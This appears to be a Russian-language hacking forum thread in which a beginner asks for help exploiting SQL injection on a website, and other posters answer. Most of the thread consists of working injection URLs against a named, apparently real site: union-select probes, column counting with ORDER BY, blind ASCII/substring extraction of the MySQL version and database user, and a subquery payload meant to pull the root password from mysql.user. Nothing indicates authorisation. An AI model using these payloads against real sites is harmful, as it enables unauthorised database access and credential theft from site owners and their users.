Вообщем так, нашёл на сайте вроде бы явную sql-injection при вставке кавычки возвращает http://www.injection.com/?dept=62&pid=665' You have an error in your SQL syntax near '\'' at line 1 Вставляю http://www.injection.com/?dept=62&pid=-999+union+select+1/* А отображается You have an error in your SQL syntax near 'union select 1/*' at line 1 При проверке http://www.injection.com/?dept=62&pid=666-1 Выдаёт страницу http://www.injection.com/?dept=62&pid=665 Что бы я не вводил, выводится запрос в тексте после +union Что такое - не получается Я только учусь и надёюсь на ваш ценный совет!
Круто! А я и не заметил, тогда сейчас попробую подобрать название колонки А что можно поиметь вот с этого сообщения http://www.mykidsfair.com/?dept=-999+union+select+1,2/* You have an error in your SQL syntax near 'union select 1,2/* AND page_class = 4' at line 1 Что за параметр page_class = 4 ?
http://www.mykidsfair.com/?dept=62+order+by+13-- на сайте стоит 3 версия мускула, это мы узнаем по 1 цифре след запроса http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(version(),1,1)))=51 а потом вытягиваем USER() http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),1,1)))=99 http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),2,1)))=106 http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),3,1)))=104 http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),4,1)))=97 http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),5,1)))=114 http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),6,1)))=109 http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),7,1)))=97 http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),8,1)))=110 http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),9,1)))=64 http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),10,1)))=108 в итоге получаем char() кодировку имени юзера 99, 106, 104, 97, 114, 109, 97, 110, 64, 108(остановился на 108, так как по практике могу сказать что там идет localhost) ps мазахисты могут еще повытягивать......
теоритически можно узнать пароль юзера зная его логин. Так же нужно знать имя базы данных, таблицу и название колонки с паролем вот пример http://www.mykidsfair.com/?dept=62&pid=66+AND+ascii(lower(substring((select+password+from+mysql.user+WHERE+user=char(114,111,111,116)+LIMIT+1),1,1)))>1 пароль берется из таблицы user находящ в базе mysql Но сдесь базы mysql походу нет, и запрос соответственно не верный
>>теоритически можно узнать пароль юзера зная его логин. Так же нужно знать имя базы данных, таблицу и название колонки с паролем в 3 версии нельзя использовать вложенный select
киби спорить не буду, так как на практике не доводилось сталкиваться с 3 версией зы теперь буду знать, спасибо
